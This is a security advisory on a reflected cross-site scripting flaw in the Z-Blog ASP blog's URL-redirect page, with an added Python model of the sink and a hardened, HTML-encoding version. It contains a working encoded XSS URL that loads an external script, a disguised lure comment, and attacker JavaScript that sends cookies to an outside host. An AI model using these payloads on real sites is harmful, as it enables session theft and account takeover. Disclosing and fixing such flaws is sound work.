Z-Blog cross-site scripting vulnerability
  Add date: 07/10/2008   Publishing date: 07/10/2008   Hits: 37
Vulnerability description: Z-Blog is an ASP-based blog program. It supports WAP and browsers such as Firefox and Opera, is widely used in China, and its official home page is http://www.rainbowsoft.org/. Z-Blog's code is rigorous, its front-end functionality is concise and its back-end functionality is powerful, which gives the product a considerable security advantage. However, 80sec found a serious cross-site scripting vulnerability in the product, and some problems in the product's design may lead to serious consequences in addition.

Vendor: http://www.rainbowsoft.org/

Vulnerability analysis: In FUNCTION/c_urlredirect.asp, the program processes the submitted url parameter as follows:

strUrl=URLDecodeForAntiSpam(Request.QueryString("url"))

URLDecodeForAntiSpam is the decoding function used to prevent spam links. It works as follows:

Function URLDecodeForAntiSpam(strUrl)
    ' Keep only the characters at positions 1, 3, 5, ... and drop the filler between them
    Dim i, s
    For i = 1 To Len(strUrl) Step 2
        s = s & Mid(strUrl, i, 1)
    Next
    URLDecodeForAntiSpam = s
End Function

After this processing, the program outputs the url parameter in c_urlredirect.asp:

<meta http-equiv="refresh" content="0; URL=<%Response.Write strUrl%>"/>

A carefully constructed url parameter therefore produces a non-persistent (reflected) XSS URL, as follows:

http://127.0.0.1/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1x2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex

Visiting the above URL causes 127.0.0.1/1.js to be loaded and executed, so arbitrary JS code can be written there.
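
The decode-then-write flow above, next to a hardened form, as an added example that is not code from the original page or from Z-Blog. It is a Python model of the ASP page; the names render_vulnerable, safe_target, render_hardened and the http/https allow-list are assumptions, and the sample inputs are constructed.

```python
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # assumption: redirects only ever go to web URLs
FORBIDDEN = set('"\'<>`')            # characters that can close the attribute or the tag


def url_decode_for_antispam(s):
    """Port of the page's URLDecodeForAntiSpam: keep characters 1, 3, 5, ..."""
    return s[::2]


def render_vulnerable(param):
    """Model of the original sink: the decoded value is written out unencoded."""
    url = url_decode_for_antispam(param)
    return '<meta http-equiv="refresh" content="0; URL=%s"/>' % url


def safe_target(param):
    """Return the decoded URL if it is an acceptable redirect target, else None."""
    url = url_decode_for_antispam(param)
    if any(ch in FORBIDDEN or ord(ch) <= 0x20 or ord(ch) == 0x7F for ch in url):
        return None
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return url


def render_hardened(param):
    """Validate the target first, then HTML-encode it at the output point."""
    url = safe_target(param)
    if url is None:
        return "<p>Invalid redirect target.</p>"
    return '<meta http-equiv="refresh" content="0; URL=%s"/>' % html.escape(url, quote=True)


# Constructed samples, interleaved with the filler character "x" as in the page's links.
GOOD = "x".join("http://www.80sec.com/?a=1&b=2") + "x"
BAD = "x".join('http://www.80sec.com/"><b>') + "x"  # harmless markup stands in for a payload

if __name__ == "__main__":
    print(render_vulnerable(BAD))
    print(render_hardened(BAD))
    print(render_hardened(GOOD))
```

In the ASP page itself, the encoding step corresponds to passing strUrl through Server.HTMLEncode before writing it into the meta tag.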

However, Z-Blog's security design is aimed entirely at resisting front-end attacks and places essentially no restrictions on the back end. In addition, the anti-spam function applies nothing like encryption to the URL links users submit, so it is very easy to lure others into visiting the XSS attack URL above. A comment can be written as follows:

Take a look at this site, is there anything new?
[URL= http://www.foo.com/function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1x2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex] http://www.80sec.com [/URL]
What the user sees is the trusted site http://www.80sec.com, but once the link is clicked, the JS specified by the malicious user is executed in the www.foo.com domain. This JS can write a shell, add a user, or steal the COOKIE and then simulate a genuine redirect, so the intent of the attack is very difficult to detect during the whole process. The JS provided by 80sec is as follows:

xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf('password')==-1?0:1;
tolocation='http://www.80sec.com/';

//get cookie
x=new Image();
x.src="http://www.80sec.com/c.php?c="+escape(document.cookie);
